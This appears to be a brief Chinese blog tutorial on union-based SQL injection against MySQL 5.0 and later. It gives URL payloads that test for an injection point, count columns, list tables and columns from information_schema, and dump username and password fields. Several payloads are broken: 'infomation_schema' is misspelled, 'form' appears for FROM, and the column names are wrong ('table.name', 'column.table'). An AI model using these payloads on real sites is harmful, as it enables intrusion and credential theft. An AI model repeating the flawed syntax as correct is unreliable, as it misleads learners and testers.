MYSQL高版本注入
首先介绍一下数据库基本的infomation_schema表
table.schema (数据库)column.table(表列) table.name (表名) group_concat(查询所有)
mysql(5.0)版本之后就有infomation_schema表
首先我们需要找到注入点 根据老方法可在后面加上and 1=1 返回正常 and 1=2 返回不正常 可判断为有注入点
其次我们可以根据数据库的原理得知 id=正常值 返回正常页面 id=你乱输入数 返回不正常页面 可判断为有注入点
找注入点
url/?id=1 order by 1,2,3,4等 去最后一个正常返回页面值 可知道注入点
收集 用户名 数据库 系统版本 数据库版本
url/?id=-1 select user(),version(),database(),@@version_compile_os() 我们假设数据库名字为 A
查表名
url/?id=-1 union select 1,group_concat(table.name) form infomation_schema.tables where table.schema ='A' 我们假设表名为 B
查列名字段
url/?id=-1 union select 1,group_concat(column.table) form infomation_schema.column where table.name ='B' 我们假设字段有 user passwd
爆字段
url/?id=-1 union select 1,user,passwd form B 我们假设返回值 root root
完成
版权声明:本文为qq_40683931原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。